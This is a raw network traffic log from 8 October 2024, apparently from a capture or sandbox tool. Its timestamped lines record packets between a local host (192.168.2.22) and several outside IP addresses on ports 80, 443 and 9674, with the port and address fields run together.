                                                                                                                                                                                              Oct 8, 2024 15:37:36.955465078 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955476999 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955487967 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955496073 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955507040 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955513954 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955521107 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955558062 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955570936 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955571890 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955604076 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955635071 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955683947 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955698013 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955713034 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955725908 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955727100 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955739975 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955750942 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955754995 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955766916 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955779076 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955781937 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955790043 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955804110 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955830097 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956036091 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956048012 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956058025 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956068993 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956079006 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956089020 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956094980 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956100941 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956110954 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956119061 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956124067 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956129074 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956332922 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956338882 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956353903 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956365108 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956374884 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956383944 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956391096 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956398964 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956413984 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956424952 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956573963 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956588030 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956599951 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956617117 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956628084 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956633091 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956638098 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956650019 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956660986 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956662893 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956672907 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956688881 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956692934 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956703901 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956720114 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.956748009 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:37.184235096 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:37.184289932 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:37.630649090 CEST4917180192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:37.630698919 CEST49168443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:37.733180046 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:37.962656021 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:37.968638897 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:37.968746901 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:37.978111029 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:37.983027935 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:38.464632988 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:38.595062017 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:38.599225998 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:38.603415012 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:38.608359098 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:38.610961914 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:38.616014957 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.029207945 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.030761003 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.037153959 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.124188900 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.129523039 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.134452105 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.134728909 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.138473988 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.143343925 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.351315975 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:37:39.352093935 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.352164030 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.356462955 CEST8049175178.237.33.50192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.356659889 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:37:39.357197046 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:37:39.362529993 CEST8049175178.237.33.50192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.614274025 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.747253895 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.747307062 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.756241083 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.761208057 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.761276007 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.767030001 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941556931 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941572905 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941584110 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941593885 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941603899 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941615105 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941625118 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941641092 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941641092 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941654921 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941663027 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941673994 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941684008 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941694975 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941704035 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.941720009 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.942291021 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.946588993 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:39.972529888 CEST8049175178.237.33.50192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.972588062 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:37:40.007713079 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.013354063 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.029587030 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.029683113 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.029694080 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.029705048 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.029715061 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.029772997 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030183077 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030194044 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030204058 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030211926 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030211926 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030222893 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030232906 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030249119 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030873060 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030884027 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030889988 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030917883 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030930042 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030940056 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.030965090 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031624079 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031632900 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031645060 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031667948 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031680107 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031689882 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.031708002 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.032444000 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.032454967 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.032464981 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.032475948 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.032483101 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.032507896 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.035490036 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.038484097 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117322922 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117363930 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117373943 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117383957 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117407084 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117424011 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117443085 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117453098 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117463112 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117472887 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117486000 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117777109 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117789030 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117800951 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117815971 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117981911 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.117993116 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118002892 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118012905 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118019104 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118030071 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118038893 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118067980 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118894100 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118956089 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118966103 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118972063 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118976116 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118982077 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.118987083 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119009972 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119031906 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119513988 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119525909 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119568110 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119579077 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119587898 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119597912 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119605064 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119673967 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119692087 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119702101 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.119743109 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120373011 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120412111 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120421886 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120438099 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120513916 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120522976 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120528936 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120533943 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120565891 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.120574951 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121354103 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121362925 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121370077 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121408939 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121450901 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121460915 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121467113 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121473074 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121511936 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.121520042 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.124234915 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203855038 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203934908 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203944921 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203955889 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203965902 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203982115 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203993082 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.203999996 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204011917 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204022884 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204040051 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204417944 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204437017 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204447031 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204454899 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204479933 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204498053 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204509974 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204541922 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204651117 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204668045 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204679012 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204699039 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204746008 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204756021 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204766989 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204776049 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204783916 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204791069 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204812050 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204822063 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.204838991 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205519915 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205530882 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205542088 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205550909 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205558062 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205568075 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205579996 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205585003 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205594063 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205605030 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205612898 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205622911 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205636978 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205642939 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205652952 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205662966 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205671072 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205679893 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205691099 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205698967 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.205724001 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.206346989 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.206357956 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.206367970 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.206377983 CEST967449174192.3.101.184192.168.2.22
